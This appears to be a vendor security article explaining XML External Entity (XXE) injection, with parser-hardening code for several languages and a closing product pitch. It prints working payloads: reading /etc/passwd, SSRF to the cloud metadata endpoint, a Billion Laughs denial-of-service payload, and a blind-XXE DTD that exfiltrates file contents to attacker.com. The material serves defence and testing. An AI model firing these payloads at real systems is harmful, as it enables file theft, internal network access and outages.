XML External Entity injection is a vulnerability class that exploits features of the XML specification itself. The XML standard supports entities — essentially variables that can reference external resources. When an XML parser processes a document containing external entity definitions, it can be tricked into reading local files, making network requests, or causing denial of service.
XXE is particularly frustrating because the vulnerable behavior is a feature, not a bug. XML parsers implement the specification correctly when they resolve external entities. The problem is that this feature is almost never needed by applications, yet it is enabled by default in many parsers.
How XXE Works
A standard XML document with an external entity:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<userInfo>
<name>&xxe;</name>
</userInfo>
When the parser processes &xxe;, it resolves the entity by reading /etc/passwd and inserting its contents where the entity reference appears. If the application returns the parsed XML content to the user, the attacker sees the file contents.
File reading is the most common XXE exploit. On Linux, /etc/passwd, /etc/shadow (if permissions allow), configuration files, and application source code are common targets. On Windows, C:\Windows\win.ini and C:\boot.ini are traditional targets.
SSRF through XXE. External entities can reference HTTP URLs:
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
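This makes the server issue the request itself, so the attacker can reach internal resources such as the cloud metadata endpoint above. In effect, it is server-side request forgery (SSRF) delivered through the XML parser.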
Denial of service (Billion Laughs). Entity definitions can reference other entities recursively:
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- ... more levels ... -->
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<data>&lol9;</data>
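Each level expands tenfold. The abbreviated payload above chains eight expansions (lol2 through lol9), so &lol9; unfolds into 10^8 copies of "lol", roughly 300 MB of text. The classic version adds one more level to reach a billion copies (about 3 GB), exhausting memory and crashing the parser.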
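The growth is easy to check with arithmetic. The sketch below computes how many copies of the base string a chain of nested entities yields, assuming every level references the previous one the same number of times. The function name and its parameters are illustrative and do not come from any library.

```python
from typing import Tuple


def expanded_size(levels: int, fanout: int = 10, base: str = "lol") -> Tuple[int, int]:
    """Return (copies, size_in_bytes) after `levels` rounds of expansion.

    Each round replaces one entity reference with `fanout` references to the
    level below it, so the number of copies grows as fanout ** levels.
    """
    copies = fanout ** levels
    return copies, copies * len(base.encode("utf-8"))


for levels in (8, 9):
    copies, size = expanded_size(levels)
    print(f"{levels} levels: {copies:,} copies, {size / 1e9:.1f} GB")
```

With a fan-out of ten, eight expansion levels give 10^8 copies (about 0.3 GB) and nine give 10^9 (about 3 GB), all from a document well under a kilobyte.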
Blind XXE
When the application does not return XML content in responses, attackers use out-of-band techniques.
Parameter entities can load external DTDs:
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
The external DTD on the attacker's server can define entities that exfiltrate data through DNS or HTTP requests:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;
This technique sends the contents of /etc/hostname to the attacker's server as a URL parameter. It is limited by URL length restrictions and characters that are invalid in URLs, but it works for many sensitive files.
Prevention: Disable External Entities
The fix is straightforward: disable external entity processing and DTD processing in your XML parser. The specific configuration varies by language.
Java (DocumentBuilderFactory):
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
Java (SAXParserFactory):
SAXParserFactory spf = SAXParserFactory.newInstance();
spf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
Python (lxml):
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True)
tree = etree.parse(source, parser)
Python (defusedxml — recommended):
import defusedxml.ElementTree as ET
tree = ET.parse(source)
The defusedxml library is a drop-in replacement for the standard library's XML modules. By default it rejects documents that declare entities and refuses to resolve external references.
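Where adding a dependency is not an option, a "forbid DTDs" policy can be approximated with the standard library alone. The following is a minimal sketch, not defusedxml's actual code: it uses xml.parsers.expat and aborts as soon as a DOCTYPE declaration starts, before any entity can be declared or expanded. The names DoctypeForbidden and reject_doctype are hypothetical.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when a document contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Parse xml_bytes with expat and raise DoctypeForbidden on any DOCTYPE.

    Malformed XML still raises xml.parsers.expat.ExpatError as usual.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called when <!DOCTYPE ...> begins, before the entity declarations
        # in its internal subset are processed.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)  # True marks this as the final chunk


safe = b"<userInfo><name>alice</name></userInfo>"
hostile = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<userInfo><name>&xxe;</name></userInfo>"
)

reject_doctype(safe)  # returns without raising
try:
    reject_doctype(hostile)
except DoctypeForbidden as exc:
    print("rejected:", exc)
```

A check like this would run before the document reaches the application's real parser. It is stricter than necessary for applications that legitimately rely on DTDs, which is the same trade-off as disallow-doctype-decl in the Java examples.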
.NET:
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(stream, settings);
PHP:
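if (PHP_VERSION_ID < 80000) {
    libxml_disable_entity_loader(true); // only needed before PHP 8.0
}
$doc = new DOMDocument();
// Do not pass LIBXML_NOENT or LIBXML_DTDLOAD: they enable entity substitution and external DTD loading.
$doc->loadXML($xml, LIBXML_NONET);
Note: libxml_disable_entity_loader is deprecated as of PHP 8.0, which requires libxml 2.9.0 or later, where external entity loading is disabled by default. Passing LIBXML_NOENT turns entity substitution back on and reintroduces the vulnerability, so leave it out unless the input is fully trusted.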
Node.js (libxmljs):
const libxmljs = require('libxmljs');
const doc = libxmljs.parseXml(xml, { noent: false, dtdload: false });
Where XXE Hides
XXE is not limited to obvious XML parsing endpoints. It appears in unexpected places:
File uploads. DOCX, XLSX, PPTX, SVG, and many other file formats are XML-based. Uploading a crafted DOCX with an XXE payload can trigger the vulnerability when the server parses the file.
SOAP services. SOAP uses XML for request and response bodies. SOAP endpoints are prime XXE targets.
SAML. Security Assertion Markup Language uses XML. SAML authentication flows parse XML assertions before the user has been authenticated, so XXE in a SAML endpoint is typically exploitable without any credentials.
RSS/Atom feeds. Applications that consume XML feeds from external sources are vulnerable if the parser processes external entities.
Configuration files. Applications that parse XML configuration files from partially trusted sources (user-uploaded configs, partner-provided settings) are at risk.
PDF generation. Some PDF generators accept XML, XHTML, or SVG input. If the underlying XML parser resolves external entities, XXE is possible.
Moving Away from XML
The most permanent fix for XXE is to stop using XML where alternatives exist. JSON does not support entities and cannot be vulnerable to XXE. Protocol Buffers, MessagePack, and other binary formats are similarly immune.
For new APIs, there is rarely a good reason to choose XML over JSON. For legacy APIs and file formats that require XML, disabling external entities is the practical solution.
Testing for XXE
Manual testing. Submit XML payloads with external entity definitions to any endpoint that accepts XML. Include payloads for file reading, SSRF, and denial of service. For blind XXE, use an out-of-band server to detect callbacks.
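For the out-of-band part, a throwaway HTTP listener is often enough to confirm a callback during an authorized test. The sketch below uses only the Python standard library. The handler class, the helper describe_callback, and the default host and port are illustrative assumptions, not part of any testing tool.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def describe_callback(path: str) -> dict:
    """Split a request target into its path and the first value of each query parameter."""
    parts = urlsplit(path)
    query = parse_qs(parts.query, keep_blank_values=True)
    return {"path": parts.path, "params": {key: values[0] for key, values in query.items()}}


class CallbackHandler(BaseHTTPRequestHandler):
    """Logs every GET request, then answers with an empty 204 response."""

    def do_GET(self):
        print(self.client_address[0], describe_callback(self.path))
        self.send_response(204)
        self.end_headers()

    def log_message(self, format, *args):
        pass  # suppress the default access log; do_GET prints its own line


def serve(host: str = "127.0.0.1", port: int = 8000) -> None:
    """Run the listener until interrupted. Call this explicitly to start it."""
    HTTPServer((host, port), CallbackHandler).serve_forever()


print(describe_callback("/?data=web01"))
```

Calling serve() on a host the target can reach, and pointing the entity URL at it, turns each parser callback into a log line. A request arriving at all confirms that the parser resolves external entities, even when no data is attached.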
Automated testing. Most DAST tools include XXE test cases, and SAST tools can flag XML parsing calls that do not disable external entities.
File upload testing. Create DOCX and XLSX files with XXE payloads in their internal XML files ([Content_Types].xml, xl/sharedStrings.xml) and upload them to the application.
How Safeguard.sh Helps
Safeguard.sh tracks every XML parsing library in your application's dependency tree. When a library is found to have an XXE-related vulnerability — or when a library defaults to unsafe XML parsing — Safeguard.sh flags it in your component inventory. The platform's continuous monitoring ensures that newly discovered XXE vulnerabilities in XML libraries are surfaced immediately, and policy gates can enforce that only properly configured, safe-by-default XML parsing libraries are used in production deployments.